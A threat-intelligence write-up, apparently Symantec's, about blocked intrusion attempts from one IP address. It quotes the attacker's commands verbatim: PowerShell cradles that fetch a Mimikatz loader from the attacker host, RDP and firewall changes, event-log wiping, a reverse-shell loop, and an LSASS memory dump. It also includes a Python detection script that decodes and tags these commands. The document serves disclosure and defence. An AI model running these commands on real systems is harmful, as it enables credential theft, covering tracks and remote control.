Attacks from Malicious IP Hit Multiple Machines in Several Countries

Persistent attempted attacks from a typical cyber crime actor were consistently thwarted by Symantec technologies. Our team examines this activity.

Not every attack we investigate results in discovering sophisticated attackers and achieving a comprehensive end-to-end understanding of the attack. For every attack we publish in detail, thousands of others are triaged by automation and, of those, we manually investigate dozens that never see public documentation other than ensuring protection in our products.

This article documents a classic case of a likely small cyber crime operation, possibly even a single individual with uncertain or only opportunistic goals. Thousands of these types of attacks are being conducted daily, but end up thwarted and so are not publicized.

Background

While investigating attempted attack techniques on our customers’ machines, we saw repeated malicious downloads from the IP 45.77.78.133. By pivoting on the IP, we were able to see that multiple other machines were also being targeted. Digging further into the machines on which the suspicious IP was found, we found the attacker has used multiple techniques, from downloading and executing malicious PowerShell scripts to attempting to dump credentials and gain access via Remote Desktop.

We have identified a relatively small — less than 40 — set of victim machines that have traces of suspicious activities related to IP 45.77.78.133, with most of the victims located in the U.S., Canada, and Mexico. The activities related to this IP were seen as recently as March 2020. While such a low number of infections could be a mark of a targeted attack, in this case, the type and diversity of the victim profiles indicates the attack is a small, opportunistic operation. The end goal of the attacker is unknown as in all our observed cases they were thwarted before a final payload was delivered. In one case, we observed a machine that had an attempted Jsworm ransomware infection as well, but this may be unrelated and a case of two attackers coincidentally breaching the same machine.

Case Study

How the attacker initially gains access to a victim machine is unknown, but in all observed cases the initial operations are conducted via PsExec, so the attacker already has credentials for victim machines. However, despite having credentialed access via PsExec, the attacker repeatedly attempts to establish an interactive Remote Desktop session instead. These attempts may be because a visual interactive session is simpler for the attacker or because the attacker’s remote PsExec actions continued to fail due to being blocked by Symantec Endpoint Protection, and the attacker likely did not understand why their actions were failing.

The first action the attacker tries is using an open source PowerShell script to inject Mimikatz and dump credentials using the sekurlsa::logonpasswords function.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://45.77.78.133/Invoke-Adios.ps1'); Invoke-Adios"

The attacker attempts to perform this command repeatedly because they are unable to see that the command has been blocked by Symantec Endpoint Protection.

Later, on different machines, the attacker replaces the Invoke-Adios.ps1 script with an updated version from the GitHub repository of the script’s original author, likely thinking their version has some bug or compatibility issue.

powershell "IEX (New-Object Net.WebClient).DownloadString('https:///invokemimiadios.ps1'); Invoke-mimiadios -DumpCreds"

After failing to dump credentials, the attacker then begins to set up a Remote Desktop session. The attacker creates a Windows firewall exception rule to allow Remote Desktop connections and then enables Remote Desktop through the registry.

netsh advfirewall firewall set rule [EC3] new enable=yes
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0

Using the same open source PowerShell script, the attacker then invokes the Mimikatz ts::multirdp function to attempt to patch Remote Desktop to allow more than one simultaneous RDP connection; this is again blocked by Symantec Endpoint Protection.

powershell -ver 2 "IEX (New-Object Net.WebClient).DownloadString('http://45.77.78.133/Invoke-Adios.ps1'); Invoke-Adios -Command 'ts::multirdp'"

We assume that the attacker then attempted to make a Remote Desktop connection that failed, and no further attacker activity is seen on the machine until days later.

The attacker becomes active again and tries to run the commands that we have seen before to enable RDP and ensure RDP is allowed through the Windows firewall.

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh advfirewall firewall set rule new enable=yes

However, this time they also try to add a user to the RDP local group before attempting their RDP connection.

CSIDL_SYSTEM\net1 localgroup "Remote Desktop Users" /add [machinename\username]

However, this is also blocked by Symantec Endpoint Protection, and the attacker’s RDP connection fails as well. A few seconds later, in order to clean up their failed attempt, they clear all event logs and restore the victim’s console session.

powershell "wevtutil el | Foreach-Object {wevtutil cl $_}"
qwinsta
tscon 2 /dest:console

Months later, the attacker attempts a new strategy by executing a generic PowerShell backdoor that allows any PowerShell commands to be executed via the network.

CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe while (1)
{
$client = New-Object System.Net.Sockets.TCPClient('45.77.78.133',19032);
…[Removed]
}

The attacker attempts to establish the backdoor network connection repeatedly, but because the command is blocked by Symantec Endpoint Protection, the connection never succeeds. The attacker then attempts the same backdoor, this time Base64-encoded, which is again blocked repeatedly.

CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe -e dwBoAGkAbABlACAAKAAxACkA … [Removed]

In one earlier case, the attacker also attempted to download a full-featured PowerShell toolkit that is stored in, and executed from, the registry.

"CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe" -E dwBoAGkAbABlACgAMQApAHsA … [Removed]
"CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe" -c "$x=$((gp HKLM:Software\Microsoft\Windows\CurrentVersion Certificate).Certificate);powershell -E $x"

The toolkit has the ability to capture keystrokes, obtain browser stored credentials, and capture clipboard content and web post content.

As the attacker’s primary means of obtaining additional credentials continually failed, in some cases the attacker was also seen attempting to dump credentials by taking a direct memory dump of the LSASS process.

CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe "rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $((get-process lsass).id) C:\Windows\lsass_$(Get-Date -Format " dd-MM-hh-mm-ss").dmp full"
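Every step of the chain above leaves a process command line behind, and the encoded variants only hide the script text from a naive string match. The following Python script is an added example, not Symantec code or tooling from this investigation: it takes constructed process-creation records (the kind an EDR or Sysmon Event ID 1 would produce) whose command lines are the ones quoted in this article, decodes any PowerShell -e/-enc/-EncodedCommand argument (Base64 of UTF-16LE text) so the real script is visible, tags each record with the stage of the chain it matches, and summarises the stages each host exhibited in time order. Host names, timestamps, the account name in the localgroup command and the reconstructed text of the backdoor loop are constructed for the example; the Base64 fragments are the ones printed above.

```python
"""Command-line triage for the attack chain described in this article.

Added example (not Symantec code). Records are constructed; the command
lines in them are the ones quoted in the article.
"""
import base64
import re

# One case-insensitive pattern per stage of the chain described above.
STAGE_PATTERNS = [(name, re.compile(rx, re.I)) for name, rx in [
    ("download_cradle",  r"New-Object\s+(System\.)?Net\.WebClient.*DownloadString"),
    ("mimikatz_loader",  r"Invoke-(Adios|mimiadios)"),
    ("rdp_fw_rule",      r"netsh\s+advfirewall\s+firewall\s+set\s+rule.*enable=yes"),
    ("rdp_enable_reg",   r"fDenyTSConnections.*/d\s+0\b"),
    ("rdp_group_add",    r"localgroup\s+.Remote Desktop Users.\s+.*/add"),
    ("eventlog_wipe",    r"wevtutil\s+el.*wevtutil\s+cl"),
    ("session_hijack",   r"\btscon\s+\d+\s+/dest:console"),
    ("reverse_shell",    r"Net\.Sockets\.TCPClient\("),
    ("registry_payload", r"\(gp\s+HKLM:[^)]*\)\.\w+\s*\)\s*;\s*powershell\s+-E\b"),
    ("lsass_minidump",   r"comsvcs\.dll,\s*MiniDump"),
]]

# -e, -ec, -en, -enc and -EncodedCommand followed by a Base64 token. PowerShell
# accepts other unambiguous prefixes too; they are not covered here.
ENCODED_ARG = re.compile(r"\s-e(?:c|n|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the script text behind an encoded-command argument, or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    token = m.group(1)
    token += "=" * (-len(token) % 4)          # truncated fragments arrive unpadded
    try:
        raw = base64.b64decode(token)
    except ValueError:                        # binascii.Error is a ValueError
        return None
    # PowerShell encodes the script as UTF-16LE; a cut-off fragment may end mid-character.
    return raw.decode("utf-16-le", errors="replace")


def triage(cmdline):
    """Tag one command line with the chain stages it matches (decoded text included)."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    stages = [name for name, rx in STAGE_PATTERNS if rx.search(haystack)]
    if decoded is not None:
        stages.insert(0, "encoded_command")
    return {"cmdline": cmdline, "decoded": decoded, "stages": stages}


def summarize_by_host(records):
    """Map host -> chronologically ordered, de-duplicated stage names it exhibited."""
    seen = {}
    for _ts, host, cmdline in sorted(records):   # ISO timestamps sort lexically
        for stage in triage(cmdline)["stages"]:
            seen.setdefault(host, [])
            if stage not in seen[host]:
                seen[host].append(stage)
    return seen


# Constructed full text of the loop the article shows truncated, encoded the
# way PowerShell -e expects (Base64 of UTF-16LE). The body is not reproduced.
BACKDOOR_TEXT = ("while (1) {$client = New-Object System.Net.Sockets.TCPClient"
                 "('45.77.78.133',19032); <body removed in the article>}")
ENCODED_BACKDOOR = base64.b64encode(BACKDOOR_TEXT.encode("utf-16-le")).decode("ascii")

# Constructed sample records: (timestamp, host, command line). Hosts, times and
# the account name are made up; the command lines are from the article.
SAMPLE_RECORDS = [
    ("2020-03-02T09:00:00", "WS-04", "C:\\Windows\\System32\\svchost.exe -k netsvcs"),  # benign noise
    ("2020-03-02T10:14:07", "WS-04",
     "powershell \"IEX (New-Object Net.WebClient).DownloadString('http://45.77.78.133/Invoke-Adios.ps1'); Invoke-Adios\""),
    ("2020-03-02T10:21:40", "WS-04", "netsh advfirewall firewall set rule new enable=yes"),
    ("2020-03-02T10:21:41", "WS-04",
     "reg add \"hklm\\system\\currentcontrolset\\control\\terminal server\" /f /v fDenyTSConnections /t REG_DWORD /d 0"),
    ("2020-03-02T10:22:03", "WS-04", "net1 localgroup \"Remote Desktop Users\" /add WS-04\\tmpadmin"),
    ("2020-03-02T10:22:30", "WS-04", "powershell \"wevtutil el | Foreach-Object {wevtutil cl $_}\""),
    ("2020-03-02T10:22:31", "WS-04", "tscon 2 /dest:console"),
    ("2020-06-11T03:40:12", "WS-04", "powershell.exe -e " + ENCODED_BACKDOOR),
    ("2020-06-11T03:41:00", "WS-04", "powershell.exe -e dwBoAGkAbABlACAAKAAxACkA"),  # fragment as printed above
    ("2020-01-20T16:05:55", "WS-09",
     "powershell.exe -c \"$x=$((gp HKLM:Software\\Microsoft\\Windows\\CurrentVersion Certificate).Certificate);powershell -E $x\""),
    ("2020-01-20T16:30:10", "WS-09",
     "powershell.exe \"rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump $((get-process lsass).id) C:\\Windows\\lsass.dmp full\""),
]

if __name__ == "__main__":
    for host, stages in summarize_by_host(SAMPLE_RECORDS).items():
        print(host, "->", " > ".join(stages))
    print("decoded fragment:", repr(decode_encoded_command(SAMPLE_RECORDS[8][2])))
```

The per-host ordering is the useful output: a single hit on `rdp_enable_reg` is routine administration, but `download_cradle` followed within minutes by RDP enablement, a local group change and `wevtutil cl` on the same host is the sequence described above, and the log-clearing step itself also surfaces as Security Event ID 1102 (audit log cleared) and System Event ID 104 (log file cleared) when those logs are forwarded off-host before they are wiped.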

Despite being persistent and coming back repeatedly and sometimes weeks later, we never observed any further exploitation beyond these repeated and ultimately failed attempts to dump credentials and establish a further foothold on these machines.

Conclusion

These attacks represent a large portion of the attacks we see on a daily basis — attackers using PowerShell to breach a system, and attempting to gain credentials to further their attack. However, these kinds of attacks are almost uniformly blocked and fail to fully breach a system, even with pre-obtained credentials and access, like in this case.

In this case, while most of the artifacts are off-the-shelf PowerShell scripts seen used by many other attackers, this attacker uniquely and consistently used the IP address 45.77.78.133 to conduct their attacks. If others have observed similar activity from this IP address, especially a machine that was fully breached, that would be of interest to understand the ultimate scope and motivation of this attacker.

Attacks from Malicious IP Hit Multiple Machines in Several Countries was originally published in Threat Intel on Medium.

Article Link: https://medium.com/threat-intel/attacks-from-malicious-ip-hit-multiple-machines-in-several-countries-e5bb4efe3ca7?source=rss-8f2689cdc4f------2